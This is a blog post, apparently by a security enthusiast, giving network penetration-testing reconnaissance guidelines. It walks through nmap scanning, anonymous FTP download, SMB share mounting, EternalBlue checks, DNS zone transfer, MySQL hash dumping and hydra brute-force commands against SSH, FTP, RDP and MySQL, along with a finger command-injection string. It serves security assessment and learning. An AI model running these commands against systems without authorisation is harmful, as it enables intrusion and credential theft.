Network Vulnerability Assessment Guidelines


Vulnerability Assessment Guidelines

This document briefs various ways you can use as a reference to check if the services can be exploited. The document necessarily does not cover everything. It should be treated as a reference instead. There are various phases of hacking. I will focus on reconnaissance throughout the document.

Note : Please perform all the pentest related work from a different machine or a virtual machine.

Reconnaissance (Information gathering)

Information gathering is the very first step required before attacking any systems. In this phase you gather information about the target network. Information can be anything ; technologies used , servers hosted in , web applications etc. I will focus on network penetration testing.

General workflow

  1. Find all alive hosts in the network
  2. Perform a port scanning
  3. Perform basic version enumeration and default script scanning with nmap
  4. Check for outdated versions and public exploits
  5. Check for ports and service specific things. For eg if you find ftp then there are several things you can do specifically in ftp like anonymous login
  6. If the service requires authentication then try to guess the passwords or choose a good wordlist. This wordlist is great. You can use tools like hydra to perform a bruteforce attack
  7. There arises various flaws which become vulnerabilities if they are exposed. For eg. memcache which runs in port 11211 does not have to be exposed to the Internet. If it’s exposed then we can make a connection to it. We can look out for such services. Another example is mysql port which does not have to be exposed in the Internet although it requires authentication.

Total number of alive hosts in the network(In this example all alive hosts are saved in a file alive-hosts-unfiltered.txt)

sudo nmap -sn -oN alive-hosts-unfiltered.txt

Doing a port scan in all the alive hosts. You can save all hosts in a separate file filtered through alive-hosts.txt. Run the following command. This command saves the output in a file named alive-hosts.txt

cat alive-hosts-unfiltered.txt | grep -i up -B 1 | grep -i report | awk '{print $5}' > alive-hosts.txt

The next step to do is perform a port scanning. This command takes the input from alive-hosts.txt , does port scanning and saves the output in port-scans.txt. It scans for all ports

sudo nmap -p- -iF alive-hosts.txt --disable-arp-ping -n -Pn -oN port-scans.txt

Now the next step to do is find the services associated with those ports alongside basic scripts provided by nmap. The command below finds service associated with the ip with basic vulnerabilities

sudo nmap -sC  -sV -p port ip -oN output

Alternatively, you can run the following command as a whole to reduce the complexity :

  1. The command below scans all ports of sub network and saves the output in a file named all-tcp-scans.xml. It takes a while to complete the scan. This scan does port scanning , version enumeration and runs default scripts to check basic misconfiguration.
sudo nmap -sC -sV -p- -oX all-tcp-scans.xml
  1. It’s tedious to read the output. You can use the given command to convert it into html and see it in a graphical form

xsltproc all-tcp-scans.xml >> all-subnetworks-scan.html

Now you can open all-subnetworks-scan.html in the browser . Once you open the file in the browser you will see various services , versions and other information. We can do the following :

  1. Check for the public exploit in the Internet. You can check in Usually only run the verified script.

Note : We have used nmap to perform tcp scans only. Sometimes, there are services which have to be discovered from udp scan. Usually tcp scan works but it’s a good idea to keep udp scan running in the background.

Services based recon


Anonymous login

You can try logging anonymously , list out and download all the files.

ftp ip
> anonymous
> anonymous
> ls -l

You can alternatively try connecting to the ftp server with


Download all files from FTP

wget -m ftp://anonymous:anonymous@ip


Basic enumeration

nmap -p 25 --script smtp-commands ip

SMTP user enumeration using nmap

nmap --script smtp-enum-users ip

Send an email

sendEmail -t -f -s ip -u Message -a /path/to/file.txt


Bruteforce passwords

Common ssh passwords : SecList

msf > use scanner/ssh/ssh_enumusers


Scan the network

nbtscan -t ip/range

Shared list

smbclient --no-pass -L //ip

Connect to the folder

smbclient --no-pass //ip/folder

Mount a shared folder

mount -t cifs //ip/share /mount/here

Scan for eternal blue exploit

sudo nmap --script ms-17-010 -p 445 ip/range


Connect to VNC

vncviewer -passwd p.txt ip::5901


Zone Transfer

dig axfr @dns-server-ip

DNS Enumeration

use auxiliary/gather/enum_dns

DNS Recon

dnsrecon -r ip/24 -n dnsip


User Enumeration

finger @ip

Automated Tool -U user.txt -t ip

Remote Command Execution

finger "|/bin/ls -a /"


Run the following command to list mountable folders

showmount -e ip


mkdir /tmp/mounthere
mount -t nfs [-o vers=2] ip:/folder /tmp/mounthere -o nolock


NTP Amplification Attack

ntpdc -n -c monlist ip


Connect To MySQL

mysql -h ip -u username -P

MySQL Enumeration

nmap -sV -p 3306 --script mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122 ip


Connect To RDP

rdesktop -u username ip

Nmap Enumeration

nmap --script "rdp-enum-encryption or rdp-vuln-ms12-020 or rdp-ntlm-info" -p 3389 ip


Almost all services that require authentication can be bruteforced. I will list out ways to bruteforce various services .


nmap --script cassandra-brute -p 9160 <IP>


hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst localhost -s 9200 http-get /


hydra -l root -P passwords.txt ip ftp


hashcat -m 16500 -a 0 jwt.txt wordlist.txt


nmap --script ldap-brute -p 389 ip


hydra -L usernames.txt -P pass.txt ip mysql


hydra -V -f -L <userslist> -P <passwlist> rdp://ip


nmap --script smb-brute -p 445 ip


hydra -l root -P passwords.txt ip ssh

Tools used (Web)

Vulnerabilities ScannerDomain
Burp SuiteWeb App/API
Acunetix Vulnerability ScannerWeb App/API
Web technologies Identification
Subdomain Enum tools
Web Content Scanner

I would recommend you to install “nessus community edition” which can scan around 16 ips for free.

Coded Brain

Hi , I am an information security enthusiast from Nepal.

Leave a Reply

Your email address will not be published.